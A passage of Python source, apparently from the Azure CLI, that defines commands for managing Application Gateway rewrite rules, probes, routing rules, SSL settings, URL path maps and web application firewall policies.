ag = ncf.get(resource_group_name, application_gateway_name)
new_set = ApplicationGatewayRewriteRuleSet(name=item_name)
upsert_to_collection(ag, 'rewrite_rule_sets', new_set, 'name')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
parent = sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag).result()
return find_child_item(parent, item_name,
path='rewrite_rule_sets', key_path='name')
def update_ag_rewrite_rule_set(instance, parent, item_name):
return parent
def create_ag_rewrite_rule(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name,
sequence=None, request_headers=None, response_headers=None, no_wait=False,
modified_path=None, modified_query_string=None, enable_reroute=None):
(ApplicationGatewayRewriteRule,
ApplicationGatewayRewriteRuleActionSet,
ApplicationGatewayUrlConfiguration) = cmd.get_models('ApplicationGatewayRewriteRule',
'ApplicationGatewayRewriteRuleActionSet',
'ApplicationGatewayUrlConfiguration')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
rule_set = find_child_item(ag, rule_set_name,
path='rewrite_rule_sets', key_path='name')
url_configuration = None
if any([modified_path, modified_query_string, enable_reroute]):
url_configuration = ApplicationGatewayUrlConfiguration(modified_path=modified_path,
modified_query_string=modified_query_string,
reroute=enable_reroute)
new_rule = ApplicationGatewayRewriteRule(
name=rule_name,
rule_sequence=sequence,
action_set=ApplicationGatewayRewriteRuleActionSet(
request_header_configurations=request_headers,
response_header_configurations=response_headers,
url_configuration=url_configuration
)
)
upsert_to_collection(rule_set, 'rewrite_rules', new_rule, 'name')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
parent = sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag).result()
return find_child_item(parent, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
def update_ag_rewrite_rule(instance, parent, cmd, rule_set_name, rule_name, sequence=None,
request_headers=None, response_headers=None,
modified_path=None, modified_query_string=None, enable_reroute=None):
with cmd.update_context(instance) as c:
c.set_param('rule_sequence', sequence)
c.set_param('action_set.request_header_configurations', request_headers)
c.set_param('action_set.response_header_configurations', response_headers)
ApplicationGatewayUrlConfiguration = cmd.get_models('ApplicationGatewayUrlConfiguration')
url_configuration = None
if any([modified_path, modified_query_string, enable_reroute]):
url_configuration = ApplicationGatewayUrlConfiguration(modified_path=modified_path,
modified_query_string=modified_query_string,
reroute=enable_reroute)
c.set_param('action_set.url_configuration', url_configuration)
return parent
def show_ag_rewrite_rule(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_item(gateway, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
def list_ag_rewrite_rules(cmd, resource_group_name, application_gateway_name, rule_set_name):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_collection(gateway, rule_set_name, path='rewrite_rule_sets.rewrite_rules', key_path='name')
def delete_ag_rewrite_rule(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name, no_wait=None):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
rule_set = find_child_item(gateway, rule_set_name, path='rewrite_rule_sets', key_path='name')
rule = find_child_item(rule_set, rule_name, path='rewrite_rules', key_path='name')
rule_set.rewrite_rules.remove(rule)
sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, application_gateway_name, gateway)
def create_ag_rewrite_rule_condition(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name,
variable, no_wait=False, pattern=None, ignore_case=None, negate=None):
ApplicationGatewayRewriteRuleCondition = cmd.get_models(
'ApplicationGatewayRewriteRuleCondition')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
rule = find_child_item(ag, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
new_condition = ApplicationGatewayRewriteRuleCondition(
variable=variable,
pattern=pattern,
ignore_case=ignore_case,
negate=negate
)
upsert_to_collection(rule, 'conditions', new_condition, 'variable')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
parent = sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag).result()
return find_child_item(parent, rule_set_name, rule_name, variable,
path='rewrite_rule_sets.rewrite_rules.conditions', key_path='name.name.variable')
def update_ag_rewrite_rule_condition(instance, parent, cmd, rule_set_name, rule_name, variable, pattern=None,
ignore_case=None, negate=None):
with cmd.update_context(instance) as c:
c.set_param('pattern', pattern)
c.set_param('ignore_case', ignore_case)
c.set_param('negate', negate)
return parent
def show_ag_rewrite_rule_condition(cmd, resource_group_name, application_gateway_name, rule_set_name,
rule_name, variable):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_item(gateway, rule_set_name, rule_name, variable,
path='rewrite_rule_sets.rewrite_rules.conditions', key_path='name.name.variable')
def list_ag_rewrite_rule_conditions(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_collection(gateway, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules.conditions', key_path='name.name')
def delete_ag_rewrite_rule_condition(cmd, resource_group_name, application_gateway_name, rule_set_name,
rule_name, variable, no_wait=None):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
rule = find_child_item(gateway, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
condition = find_child_item(rule, variable, path='conditions', key_path='variable')
rule.conditions.remove(condition)
sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, application_gateway_name, gateway)
def create_ag_probe(cmd, resource_group_name, application_gateway_name, item_name, protocol, host,
path, interval=30, timeout=120, threshold=8, no_wait=False, host_name_from_http_settings=None,
min_servers=None, match_body=None, match_status_codes=None, port=None):
ApplicationGatewayProbe, ProbeMatchCriteria = cmd.get_models(
'ApplicationGatewayProbe', 'ApplicationGatewayProbeHealthResponseMatch')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_probe = ApplicationGatewayProbe(
name=item_name,
protocol=protocol,
host=host,
path=path,
interval=interval,
timeout=timeout,
unhealthy_threshold=threshold)
if cmd.supported_api_version(min_api='2017-06-01'):
new_probe.pick_host_name_from_backend_http_settings = host_name_from_http_settings
new_probe.min_servers = min_servers
new_probe.match = ProbeMatchCriteria(body=match_body, status_codes=match_status_codes)
if cmd.supported_api_version(min_api='2019-04-01'):
new_probe.port = port
upsert_to_collection(ag, 'probes', new_probe, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_probe(cmd, instance, parent, item_name, protocol=None, host=None, path=None,
interval=None, timeout=None, threshold=None, host_name_from_http_settings=None,
min_servers=None, match_body=None, match_status_codes=None, port=None):
if protocol is not None:
instance.protocol = protocol
if host is not None:
instance.host = host
if path is not None:
instance.path = path
if interval is not None:
instance.interval = interval
if timeout is not None:
instance.timeout = timeout
if threshold is not None:
instance.unhealthy_threshold = threshold
if host_name_from_http_settings is not None:
instance.pick_host_name_from_backend_http_settings = host_name_from_http_settings
if min_servers is not None:
instance.min_servers = min_servers
if match_body is not None or match_status_codes is not None:
ProbeMatchCriteria = \
cmd.get_models('ApplicationGatewayProbeHealthResponseMatch')
instance.match = instance.match or ProbeMatchCriteria()
if match_body is not None:
instance.match.body = match_body
if match_status_codes is not None:
instance.match.status_codes = match_status_codes
if port is not None:
instance.port = port
return parent
def create_ag_request_routing_rule(cmd, resource_group_name, application_gateway_name, item_name,
address_pool=None, http_settings=None, http_listener=None, redirect_config=None,
url_path_map=None, rule_type='Basic', no_wait=False, rewrite_rule_set=None,
priority=None):
ApplicationGatewayRequestRoutingRule, SubResource = cmd.get_models(
'ApplicationGatewayRequestRoutingRule', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
if not address_pool and not redirect_config:
address_pool = _get_default_id(ag, 'backend_address_pools', '--address-pool')
if not http_settings and not redirect_config:
http_settings = _get_default_id(ag, 'backend_http_settings_collection', '--http-settings')
if not http_listener:
http_listener = _get_default_id(ag, 'http_listeners', '--http-listener')
new_rule = ApplicationGatewayRequestRoutingRule(
name=item_name,
rule_type=rule_type,
priority=priority,
backend_address_pool=SubResource(id=address_pool) if address_pool else None,
backend_http_settings=SubResource(id=http_settings) if http_settings else None,
http_listener=SubResource(id=http_listener),
url_path_map=SubResource(id=url_path_map) if url_path_map else None)
if cmd.supported_api_version(min_api='2017-06-01'):
new_rule.redirect_configuration = SubResource(id=redirect_config) if redirect_config else None
rewrite_rule_set_name = next(key for key, value in locals().items() if id(value) == id(rewrite_rule_set))
if cmd.supported_api_version(parameter_name=rewrite_rule_set_name):
new_rule.rewrite_rule_set = SubResource(id=rewrite_rule_set) if rewrite_rule_set else None
upsert_to_collection(ag, 'request_routing_rules', new_rule, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_request_routing_rule(cmd, instance, parent, item_name, address_pool=None,
http_settings=None, http_listener=None, redirect_config=None, url_path_map=None,
rule_type=None, rewrite_rule_set=None, priority=None):
SubResource = cmd.get_models('SubResource')
if address_pool is not None:
instance.backend_address_pool = SubResource(id=address_pool)
if http_settings is not None:
instance.backend_http_settings = SubResource(id=http_settings)
if redirect_config is not None:
instance.redirect_configuration = SubResource(id=redirect_config)
if http_listener is not None:
instance.http_listener = SubResource(id=http_listener)
if url_path_map is not None:
instance.url_path_map = SubResource(id=url_path_map)
if rule_type is not None:
instance.rule_type = rule_type
if rewrite_rule_set is not None:
instance.rewrite_rule_set = SubResource(id=rewrite_rule_set)
with cmd.update_context(instance) as c:
c.set_param('priority', priority)
return parent
def create_ag_ssl_certificate(cmd, resource_group_name, application_gateway_name, item_name, cert_data=None,
cert_password=None, key_vault_secret_id=None, no_wait=False):
ApplicationGatewaySslCertificate = cmd.get_models('ApplicationGatewaySslCertificate')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_cert = ApplicationGatewaySslCertificate(
name=item_name, data=cert_data, password=cert_password, key_vault_secret_id=key_vault_secret_id)
upsert_to_collection(ag, 'ssl_certificates', new_cert, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_ssl_certificate(instance, parent, item_name,
cert_data=None, cert_password=None, key_vault_secret_id=None):
if cert_data is not None:
instance.data = cert_data
if cert_password is not None:
instance.password = cert_password
if key_vault_secret_id is not None:
instance.key_vault_secret_id = key_vault_secret_id
return parent
def set_ag_ssl_policy_2017_03_01(cmd, resource_group_name, application_gateway_name, disabled_ssl_protocols=None,
clear=False, no_wait=False):
ApplicationGatewaySslPolicy = cmd.get_models('ApplicationGatewaySslPolicy')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ag.ssl_policy = None if clear else ApplicationGatewaySslPolicy(
disabled_ssl_protocols=disabled_ssl_protocols)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def set_ag_ssl_policy_2017_06_01(cmd, resource_group_name, application_gateway_name, policy_name=None, policy_type=None,
disabled_ssl_protocols=None, cipher_suites=None, min_protocol_version=None,
no_wait=False):
ApplicationGatewaySslPolicy, ApplicationGatewaySslPolicyType = cmd.get_models(
'ApplicationGatewaySslPolicy', 'ApplicationGatewaySslPolicyType')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
policy_type = None
if policy_name:
policy_type = ApplicationGatewaySslPolicyType.predefined.value
elif cipher_suites or min_protocol_version:
policy_type = ApplicationGatewaySslPolicyType.custom.value
ag.ssl_policy = ApplicationGatewaySslPolicy(
policy_name=policy_name,
policy_type=policy_type,
disabled_ssl_protocols=disabled_ssl_protocols,
cipher_suites=cipher_suites,
min_protocol_version=min_protocol_version)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def show_ag_ssl_policy(cmd, resource_group_name, application_gateway_name):
return network_client_factory(cmd.cli_ctx).application_gateways.get(
resource_group_name, application_gateway_name).ssl_policy
def create_ag_trusted_root_certificate(cmd, resource_group_name, application_gateway_name, item_name, no_wait=False,
cert_data=None, keyvault_secret=None):
ApplicationGatewayTrustedRootCertificate = cmd.get_models('ApplicationGatewayTrustedRootCertificate')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
root_cert = ApplicationGatewayTrustedRootCertificate(name=item_name, data=cert_data,
key_vault_secret_id=keyvault_secret)
upsert_to_collection(ag, 'trusted_root_certificates', root_cert, 'name')
return sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_trusted_root_certificate(instance, parent, item_name, cert_data=None, keyvault_secret=None):
if cert_data is not None:
instance.data = cert_data
if keyvault_secret is not None:
instance.key_vault_secret_id = keyvault_secret
return parent
def create_ag_url_path_map(cmd, resource_group_name, application_gateway_name, item_name, paths,
address_pool=None, http_settings=None, redirect_config=None, rewrite_rule_set=None,
default_address_pool=None, default_http_settings=None, default_redirect_config=None,
no_wait=False, rule_name='default', default_rewrite_rule_set=None, firewall_policy=None):
ApplicationGatewayUrlPathMap, ApplicationGatewayPathRule, SubResource = cmd.get_models(
'ApplicationGatewayUrlPathMap', 'ApplicationGatewayPathRule', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_rule = ApplicationGatewayPathRule(
name=rule_name,
backend_address_pool=SubResource(id=address_pool) if address_pool else None,
backend_http_settings=SubResource(id=http_settings) if http_settings else None,
paths=paths
)
new_map = ApplicationGatewayUrlPathMap(
name=item_name,
default_backend_address_pool=SubResource(id=default_address_pool) if default_address_pool else None,
default_backend_http_settings=SubResource(id=default_http_settings) if default_http_settings else None,
path_rules=[])
if cmd.supported_api_version(min_api='2017-06-01'):
new_rule.redirect_configuration = SubResource(id=redirect_config) if redirect_config else None
new_map.default_redirect_configuration = \
SubResource(id=default_redirect_config) if default_redirect_config else None
rewrite_rule_set_name = next(key for key, value in locals().items() if id(value) == id(rewrite_rule_set))
if cmd.supported_api_version(parameter_name=rewrite_rule_set_name):
new_rule.rewrite_rule_set = SubResource(id=rewrite_rule_set) if rewrite_rule_set else None
new_map.default_rewrite_rule_set = \
SubResource(id=default_rewrite_rule_set) if default_rewrite_rule_set else None
if cmd.supported_api_version(min_api='2019-09-01'):
new_rule.firewall_policy = SubResource(id=firewall_policy) if firewall_policy else None
# pull defaults from the rule specific properties if the default-* option isn't specified
if new_rule.backend_address_pool and not new_map.default_backend_address_pool:
new_map.default_backend_address_pool = new_rule.backend_address_pool
if new_rule.backend_http_settings and not new_map.default_backend_http_settings:
new_map.default_backend_http_settings = new_rule.backend_http_settings
if new_rule.redirect_configuration and not new_map.default_redirect_configuration:
new_map.default_redirect_configuration = new_rule.redirect_configuration
new_map.path_rules.append(new_rule)
upsert_to_collection(ag, 'url_path_maps', new_map, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_url_path_map(cmd, instance, parent, item_name, default_address_pool=None,
default_http_settings=None, default_redirect_config=None, raw=False,
default_rewrite_rule_set=None):
SubResource = cmd.get_models('SubResource')
if default_address_pool == '':
instance.default_backend_address_pool = None
elif default_address_pool:
instance.default_backend_address_pool = SubResource(id=default_address_pool)
if default_http_settings == '':
instance.default_backend_http_settings = None
elif default_http_settings:
instance.default_backend_http_settings = SubResource(id=default_http_settings)
if default_redirect_config == '':
instance.default_redirect_configuration = None
elif default_redirect_config:
instance.default_redirect_configuration = SubResource(id=default_redirect_config)
if default_rewrite_rule_set == '':
instance.default_rewrite_rule_set = None
elif default_rewrite_rule_set:
instance.default_rewrite_rule_set = SubResource(id=default_rewrite_rule_set)
return parent
def create_ag_url_path_map_rule(cmd, resource_group_name, application_gateway_name, url_path_map_name,
item_name, paths, address_pool=None, http_settings=None, redirect_config=None,
firewall_policy=None, no_wait=False, rewrite_rule_set=None):
ApplicationGatewayPathRule, SubResource = cmd.get_models('ApplicationGatewayPathRule', 'SubResource')
if address_pool and redirect_config:
raise CLIError("Cannot reference a BackendAddressPool when Redirect Configuration is specified.")
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
url_map = next((x for x in ag.url_path_maps if x.name == url_path_map_name), None)
if not url_map:
raise CLIError('URL path map "{}" not found.'.format(url_path_map_name))
default_backend_pool = SubResource(id=url_map.default_backend_address_pool.id) \
if (url_map.default_backend_address_pool and not redirect_config) else None
default_http_settings = SubResource(id=url_map.default_backend_http_settings.id) \
if url_map.default_backend_http_settings else None
new_rule = ApplicationGatewayPathRule(
name=item_name,
paths=paths,
backend_address_pool=SubResource(id=address_pool) if address_pool else default_backend_pool,
backend_http_settings=SubResource(id=http_settings) if http_settings else default_http_settings)
if cmd.supported_api_version(min_api='2017-06-01'):
default_redirect = SubResource(id=url_map.default_redirect_configuration.id) \
if (url_map.default_redirect_configuration and not address_pool) else None
new_rule.redirect_configuration = SubResource(id=redirect_config) if redirect_config else default_redirect
rewrite_rule_set_name = next(key for key, value in locals().items() if id(value) == id(rewrite_rule_set))
if cmd.supported_api_version(parameter_name=rewrite_rule_set_name):
new_rule.rewrite_rule_set = SubResource(id=rewrite_rule_set) if rewrite_rule_set else None
if cmd.supported_api_version(min_api='2019-09-01'):
new_rule.firewall_policy = SubResource(id=firewall_policy) if firewall_policy else None
upsert_to_collection(url_map, 'path_rules', new_rule, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def delete_ag_url_path_map_rule(cmd, resource_group_name, application_gateway_name, url_path_map_name,
item_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
url_map = next((x for x in ag.url_path_maps if x.name == url_path_map_name), None)
if not url_map:
raise CLIError('URL path map "{}" not found.'.format(url_path_map_name))
url_map.path_rules = \
[x for x in url_map.path_rules if x.name.lower() != item_name.lower()]
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def set_ag_waf_config_2016_09_01(cmd, resource_group_name, application_gateway_name, enabled,
firewall_mode=None,
no_wait=False):
ApplicationGatewayWebApplicationFirewallConfiguration = cmd.get_models(
'ApplicationGatewayWebApplicationFirewallConfiguration')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ag.web_application_firewall_configuration = \
ApplicationGatewayWebApplicationFirewallConfiguration(
enabled=(enabled == 'true'), firewall_mode=firewall_mode)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def set_ag_waf_config_2017_03_01(cmd, resource_group_name, application_gateway_name, enabled,
firewall_mode=None,
rule_set_type='OWASP', rule_set_version=None,
disabled_rule_groups=None,
disabled_rules=None, no_wait=False,
request_body_check=None, max_request_body_size=None, file_upload_limit=None,
exclusions=None):
ApplicationGatewayWebApplicationFirewallConfiguration = cmd.get_models(
'ApplicationGatewayWebApplicationFirewallConfiguration')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ag.web_application_firewall_configuration = \
ApplicationGatewayWebApplicationFirewallConfiguration(
enabled=(enabled == 'true'), firewall_mode=firewall_mode, rule_set_type=rule_set_type,
rule_set_version=rule_set_version)
if disabled_rule_groups or disabled_rules:
ApplicationGatewayFirewallDisabledRuleGroup = cmd.get_models('ApplicationGatewayFirewallDisabledRuleGroup')
disabled_groups = []
# disabled groups can be added directly
for group in disabled_rule_groups or []:
disabled_groups.append(ApplicationGatewayFirewallDisabledRuleGroup(rule_group_name=group))
def _flatten(collection, expand_property_fn):
for each in collection:
for value in expand_property_fn(each):
yield value
# for disabled rules, we have to look up the IDs
if disabled_rules:
results = list_ag_waf_rule_sets(ncf, _type=rule_set_type, version=rule_set_version, group='*')
for group in _flatten(results, lambda r: r.rule_groups):
disabled_group = ApplicationGatewayFirewallDisabledRuleGroup(
rule_group_name=group.rule_group_name, rules=[])
for rule in group.rules:
if str(rule.rule_id) in disabled_rules:
disabled_group.rules.append(rule.rule_id)
if disabled_group.rules:
disabled_groups.append(disabled_group)
ag.web_application_firewall_configuration.disabled_rule_groups = disabled_groups
if cmd.supported_api_version(min_api='2018-08-01'):
ag.web_application_firewall_configuration.request_body_check = request_body_check
ag.web_application_firewall_configuration.max_request_body_size_in_kb = max_request_body_size
ag.web_application_firewall_configuration.file_upload_limit_in_mb = file_upload_limit
ag.web_application_firewall_configuration.exclusions = exclusions
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def show_ag_waf_config(cmd, resource_group_name, application_gateway_name):
return network_client_factory(cmd.cli_ctx).application_gateways.get(
resource_group_name, application_gateway_name).web_application_firewall_configuration
def list_ag_waf_rule_sets(client, _type=None, version=None, group=None):
results = client.list_available_waf_rule_sets().value
filtered_results = []
# filter by rule set name or version
for rule_set in results:
if _type and _type.lower() != rule_set.rule_set_type.lower():
continue
if version and version.lower() != rule_set.rule_set_version.lower():
continue
filtered_groups = []
for rule_group in rule_set.rule_groups:
if not group:
rule_group.rules = None
filtered_groups.append(rule_group)
elif group.lower() == rule_group.rule_group_name.lower() or group == '*':
filtered_groups.append(rule_group)
if filtered_groups:
rule_set.rule_groups = filtered_groups
filtered_results.append(rule_set)
return filtered_results
# endregion
# region ApplicationGatewayWAFPolicy
def create_ag_waf_policy(cmd, client, resource_group_name, policy_name,
location=None, tags=None, rule_set_type='OWASP',
rule_set_version='3.0'):
WebApplicationFirewallPolicy, ManagedRulesDefinition, \
ManagedRuleSet = cmd.get_models('WebApplicationFirewallPolicy',
'ManagedRulesDefinition',
'ManagedRuleSet')
# https://docs.microsoft.com/en-us/azure/application-gateway/waf-overview
# mandatory default rule with empty rule sets
managed_rule_set = ManagedRuleSet(rule_set_type=rule_set_type, rule_set_version=rule_set_version)
managed_rule_definition = ManagedRulesDefinition(managed_rule_sets=[managed_rule_set])
waf_policy = WebApplicationFirewallPolicy(location=location, tags=tags, managed_rules=managed_rule_definition)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def update_ag_waf_policy(cmd, instance, tags=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
return instance
def list_ag_waf_policies(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'web_application_firewall_policies', resource_group_name)
# endregion
# region ApplicationGatewayWAFPolicyRules PolicySettings
def update_waf_policy_setting(cmd, instance,
state=None, mode=None,
max_request_body_size_in_kb=None, file_upload_limit_in_mb=None,
request_body_check=False):
if state is not None:
instance.policy_settings.state = state
if mode is not None:
instance.policy_settings.mode = mode
if max_request_body_size_in_kb is not None:
instance.policy_settings.max_request_body_size_in_kb = max_request_body_size_in_kb
if file_upload_limit_in_mb is not None:
instance.policy_settings.file_upload_limit_in_mb = file_upload_limit_in_mb
if request_body_check is not None:
instance.policy_settings.request_body_check = request_body_check
return instance
def list_waf_policy_setting(cmd, client, resource_group_name, policy_name):
return client.get(resource_group_name, policy_name).policy_settings
# endregion
# region ApplicationGatewayWAFPolicyRules
def create_waf_custom_rule(cmd, client, resource_group_name, policy_name, rule_name, priority, rule_type, action):
"""
Initialize custom rule for WAF policy
"""
WebApplicationFirewallCustomRule = cmd.get_models('WebApplicationFirewallCustomRule')
waf_policy = client.get(resource_group_name, policy_name)
new_custom_rule = WebApplicationFirewallCustomRule(
name=rule_name,
action=action,
match_conditions=[],
priority=priority,
rule_type=rule_type
)
upsert_to_collection(waf_policy, 'custom_rules', new_custom_rule, 'name')
parent = client.create_or_update(resource_group_name, policy_name, waf_policy)
return find_child_item(parent, rule_name, path='custom_rules', key_path='name')
# pylint: disable=unused-argument
def update_waf_custom_rule(instance, parent, cmd, rule_name, priority=None, rule_type=None, action=None):
with cmd.update_context(instance) as c:
c.set_param('priority', priority)
c.set_param('rule_type', rule_type)
c.set_param('action', action)
return parent
def show_waf_custom_rule(cmd, client, resource_group_name, policy_name, rule_name):
waf_policy = client.get(resource_group_name, policy_name)
return find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
def list_waf_custom_rules(cmd, client, resource_group_name, policy_name):
return client.get(resource_group_name, policy_name).custom_rules
def delete_waf_custom_rule(cmd, client, resource_group_name, policy_name, rule_name, no_wait=None):
waf_policy = client.get(resource_group_name, policy_name)
rule = find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
waf_policy.custom_rules.remove(rule)
sdk_no_wait(no_wait, client.create_or_update, resource_group_name, policy_name, waf_policy)
# endregion
# region ApplicationGatewayWAFPolicyRuleMatchConditions
def add_waf_custom_rule_match_cond(cmd, client, resource_group_name, policy_name, rule_name,
match_variables, operator, match_values, negation_condition=None, transforms=None):
MatchCondition = cmd.get_models('MatchCondition')
waf_policy = client.get(resource_group_name, policy_name)
custom_rule = find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
new_cond = MatchCondition(
match_variables=match_variables,
operator=operator,
match_values=match_values,
negation_conditon=negation_condition,
transforms=transforms
)
custom_rule.match_conditions.append(new_cond)
upsert_to_collection(waf_policy, 'custom_rules', custom_rule, 'name', warn=False)
client.create_or_update(resource_group_name, policy_name, waf_policy)
return new_cond
def list_waf_custom_rule_match_cond(cmd, client, resource_group_name, policy_name, rule_name):
waf_policy = client.get(resource_group_name, policy_name)
return find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name').match_conditions
def remove_waf_custom_rule_match_cond(cmd, client, resource_group_name, policy_name, rule_name, index):
waf_policy = client.get(resource_group_name, policy_name)
rule = find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
rule.match_conditions.pop(index)
client.create_or_update(resource_group_name, policy_name, waf_policy)
# endregion
# region ApplicationGatewayWAFPolicy ManagedRule ManagedRuleSet
def add_waf_managed_rule_set(cmd, client, resource_group_name, policy_name,
rule_set_type, rule_set_version,
rule_group_name=None, rules=None):
"""
Add managed rule set to the WAF policy managed rules.
Visit: https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules
"""
ManagedRuleSet, ManagedRuleGroupOverride, ManagedRuleOverride = \
cmd.get_models('ManagedRuleSet', 'ManagedRuleGroupOverride', 'ManagedRuleOverride')
waf_policy = client.get(resource_group_name, policy_name)
managed_rule_overrides = [ManagedRuleOverride(rule_id=r) for r in rules] if rules is not None else []
rule_group_override = None
if rule_group_name is not None:
rule_group_override = ManagedRuleGroupOverride(rule_group_name=rule_group_name,
rules=managed_rule_overrides)
new_managed_rule_set = ManagedRuleSet(rule_set_type=rule_set_type,
rule_set_version=rule_set_version,
rule_group_overrides=[rule_group_override] if rule_group_override is not None else []) # pylint: disable=line-too-long
for rule_set in waf_policy.managed_rules.managed_rule_sets:
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version == rule_set_version:
for rule_override in rule_set.rule_group_overrides:
if rule_override.rule_group_name == rule_group_name:
# Add one rule
rule_override.rules.extend(managed_rule_overrides)
break
else:
# Add one rule group
if rule_group_override is not None:
rule_set.rule_group_overrides.append(rule_group_override)
break
else:
# Add new rule set
waf_policy.managed_rules.managed_rule_sets.append(new_managed_rule_set)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def update_waf_managed_rule_set(cmd, instance, rule_set_type, rule_set_version, rule_group_name=None, rules=None):
"""
Update(Override) existing rule set of a WAF policy managed rules.
"""
ManagedRuleSet, ManagedRuleGroupOverride, ManagedRuleOverride = \
cmd.get_models('ManagedRuleSet', 'ManagedRuleGroupOverride', 'ManagedRuleOverride')
managed_rule_overrides = [ManagedRuleOverride(rule_id=r) for r in rules] if rules else None
rule_group_override = ManagedRuleGroupOverride(rule_group_name=rule_group_name,
rules=managed_rule_overrides) if managed_rule_overrides else None
new_managed_rule_set = ManagedRuleSet(rule_set_type=rule_set_type,
rule_set_version=rule_set_version,
rule_group_overrides=[rule_group_override] if rule_group_override is not None else []) # pylint: disable=line-too-long
updated_rule_set = None
for rule_set in instance.managed_rules.managed_rule_sets:
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version != rule_set_version:
updated_rule_set = rule_set
break
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version == rule_set_version:
if rule_group_name is None:
updated_rule_set = rule_set
break
rg = next((rg for rg in rule_set.rule_group_overrides if rg.rule_group_name == rule_group_name), None)
if rg:
rg.rules = managed_rule_overrides # differentiate with add_waf_managed_rule_set()
else:
rule_set.rule_group_overrides.append(rule_group_override)
if updated_rule_set:
instance.managed_rules.managed_rule_sets.remove(updated_rule_set)
instance.managed_rules.managed_rule_sets.append(new_managed_rule_set)
return instance
def remove_waf_managed_rule_set(cmd, client, resource_group_name, policy_name,
rule_set_type, rule_set_version, rule_group_name=None):
"""
Remove a managed rule set by rule set group name if rule_group_name is specified. Otherwise, remove all rule set.
"""
